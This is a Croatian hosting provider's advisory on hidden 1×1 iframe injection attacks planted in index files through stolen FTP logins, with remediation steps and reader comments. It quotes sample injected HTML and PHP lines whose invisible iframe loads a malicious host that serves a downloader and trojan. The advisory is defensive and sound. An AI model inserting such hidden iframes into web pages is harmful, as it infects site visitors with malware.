Zadnjih par tjedana u toku su iframe napadi koji u index.* fileove ubacuju iframe velicine 1×1 piksela.
Kao što se vidi iz codea, veličina iframea je 1×1 piksel i otvara sadrzaj sa goooogleadsence.biz ili neke druge stranice, zavisno od slučaja do slučaja. Taj iframe učitava downloader, koji onda skida trojanca koji “naseli” Vaše računalo.
Tipični primjeri su:
HTML stranice
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
PHP stranice
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
Sada se većina Vas pita, kako je moguće da netko modificira moje webove? Zar nemate nikakvu zaštitu na serverima?
Sam propust nije na serveru, nego kod samog korisnika. Pregledom logova za svaki slučaj napada koji smo imali, primjetili smo da se napadač (bot) uredno ulogirao na FTP, downloadao index.* file, izmjenio ga i uploadao nazad na server. Naravno, logiranje se je svaki put vršilo sa drugačije IP adrese, te je teško (čitaj: nemoguće) predvidjeti logiranje i blokiranje pristupa toj IP adresi.
Koje je rješenje ovog problema?
U ovom trenutku, izmjena passworda za FTP i cPanel pristup, te čišćenje računala. Ukoliko je Vaš web pogođen ovim problemom, kontaktirajte našu službu za korisnike koja će izmjeniti password od FTP-a i cPanela, te očistiti Vaše web stranice. Od korisnika se zahtijeva da skenira računalo sa nekim kvalitetnim antivirusnim alatom (Avira, AVG, Kaspersky, NOD, itd..) sa NAJSVJEŽIJIM updateovima.
Kada korisnik potvrdi da mu je računalo čisto, mailom ili support ticketom može zatražiti novi password od FTP-a /cPanela.
Da li će ovaj problem utjecati na moj ranking na tražilicama?
Pa, ukoliko ne primjetite problem i on ostane na webu duže vremena nesaniran – da, Vaš rank na tražilicama će pasti, a oni posjetitelji koji dođu direktno na Vaš web biti će upozoreni da stranica može naštetiti računalu, što će direktno imati za posljedicu manje posjeta, loš ugled, te u krajnoj liniji manje posla, ukoliko se Vaše poslovanje bazira na web stranicama. Ako primjetite bilo kakvu anomaliju na Vašem webu, odmah kontaktirajte našu službu za korisnike koja će istražiti problem.
Ukoliko se nakon promjene passworda i čišćenja računala problem i dalje javlja, znači da Vam računalo nije još potpuno čišto, te bi čišćenje trebalo napraviti sa par alata, tako da se eliminira problem sa antivirusnim softwareom koji koristite.
Link na par web stranica koje obrađuju istu tematiku:
Hidden iframe injection attacks | Diovo
Iframe injection – nova glavobolja za webmastere | wm.com.hr
Jedan zanimljivi post na Google Online Security blogu:
Ugh da neugodni su napadi, ja sam ih počeo “ručno” riješavati 🙂
Ja nemam problema s tim. Koristim ubuntu linux i do sada nisam imao nikakvih problema. 😉
Meni je ovaj virus zarazio jednu web stranicu i forum, ali su mi odmah izašli u susret sa hostinga i riješili problem, a ja sam sam rješio problem na forumu u index.php file. Neka luda java skripta. Kad se otvori u eksploreru počnu iskakati prozori kao da nešto želi instalirati od programa iz windowsa. U firefoksu ga je označio kao malicious site. zaražena stranica. To sam isto rješio na način da sam u webmaster tools ponovo zatražio inspekciju stranice nakon što sam maknuo skripte. Tada sam pobrisao sve pasvorde sa računala. Ali ovdje sam saznao da moram maknuti i pasvorde sa log in formi.
Sretno svima
Pregledala sam svoju web stranicu, pregledala je s Avirom i nema nikakvih takvih izmjena. Sve je o.k.
Hvala na infu.
ćajos, sretno svima
Zaštita s korisničke strane može biti korištenje Firefoxa i NoScript add-ona, u kojem treba aktivirati opciju blokiranja IFramea.
Koristim Ubuntu linux i nisam iskusio još nikakvih problema sličnih ovom. Nikad si ne mogu dovoljno puta čestitati na odluci što sam prešao na Ubuntu u cjelosti 😀
Khm … izgleda da mi je ipak site unatoč linuxu podlegao napadu. Kada kliknem u googlu na moj link otvara mi p3p0.com, a ljudi koji koriste vindowse javljaju mi da im se pali upozorenje antivirusa o trojanu JS:FakeAV-DX[Trj]. Gledao php ali nigdje nisam pronasao problem 🙁 …. ima li tko ideja?